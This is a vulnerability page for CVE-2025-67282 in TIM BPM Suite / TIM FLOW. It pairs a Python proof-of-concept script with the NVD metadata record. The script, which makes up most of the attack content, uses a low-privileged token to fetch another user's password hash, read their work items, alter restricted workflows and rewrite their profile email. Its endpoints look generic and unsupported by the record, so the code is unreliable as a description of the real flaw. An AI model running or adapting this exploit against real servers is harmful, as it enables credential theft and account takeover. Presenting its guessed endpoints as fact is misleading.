CVE-2025-67282

# CVE-2025-67282 Authorization Bypass PoC # Target: TIM BPM Suite / TIM FLOW <= 9.1.2 import requests import json TARGET_URL = "https://target-server.com" ATTACKER_TOKEN = "attacker_session_token" TARGET_USER_ID = "victim_user_id" headers = { "Authorization": f"Bearer {ATTACKER_TOKEN}", "Content-Type": "application/json" } # PoC 1: Download other user's password hash def download_password_hash(): endpoint = f"{TARGET_URL}/api/users/{TARGET_USER_ID}/password-hash" response = requests.get(endpoint, headers=headers) print(f"Password Hash Response: {response.status_code}") return response.json() # PoC 2: Access other user's work items def access_work_items(): endpoint = f"{TARGET_URL}/api/workitems?userId={TARGET_USER_ID}" response = requests.get(endpoint, headers=headers) print(f"Work Items Response: {response.status_code}") return response.json() # PoC 3: Modify restricted workflow content def modify_workflow(): endpoint = f"{TARGET_URL}/api/workflows/restricted-content" payload = { "content": "malicious_content", "targetUserId": TARGET_USER_ID } response = requests.post(endpoint, headers=headers, json=payload) print(f"Workflow Modify Response: {response.status_code}") return response.json() # PoC 4: Manipulate other user's profile def manipulate_profile(): endpoint = f"{TARGET_URL}/api/users/{TARGET_USER_ID}/profile" payload = { "email": "[email protected]", "phone": "+1234567890" } response = requests.put(endpoint, headers=headers, json=payload) print(f"Profile Manipulate Response: {response.status_code}") return response.json() if __name__ == "__main__": print("Testing CVE-2025-67282 Authorization Bypass") download_password_hash() access_work_items() modify_workflow() manipulate_profile()

{"cve": {"id": "CVE-2025-67282", "sourceIdentifier": "[email protected]", "published": "2026-01-09T16:16:07.623", "lastModified": "2026-01-22T21:32:26.063", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In TIM BPM Suite/ TIM FLOW through 9.1.2 multiple Authorization Bypass vulnerabilities exists which allow a low privileged user to download password hashes of other user, access work items of other user, modify restricted content in workflows, modify the applications logo and manipulate the profile of other user."}, {"lang": "es", "value": "En TIM BPM Suite/ TIM FLOW a través de 9.1.2 existen múltiples vulnerabilidades de omisión de autorización que permiten a un usuario con pocos privilegios descargar hashes de contraseñas de otros usuarios, acceder a elementos de trabajo de otros usuarios, modificar contenido restringido en flujos de trabajo, modificar el logotipo de las aplicaciones y manipular el perfil de otros usuarios."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-288"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:tim-solutions:tim_flow:*:*:*:*:*:*:*:*", "versionEndExcluding": "9.1.2", "matchCriteriaId": "071D6670-88DB-4539-A1F9-1850251BDD53"}]}]}], "references": [{"url": "https://tim-doc.atlassian.net/wiki/spaces/eng/pages/230981636/Release+Notes", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://www.y-security.de/news-en/tim-bpm-suite-tim-flow-multiple-vulnerabilities/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}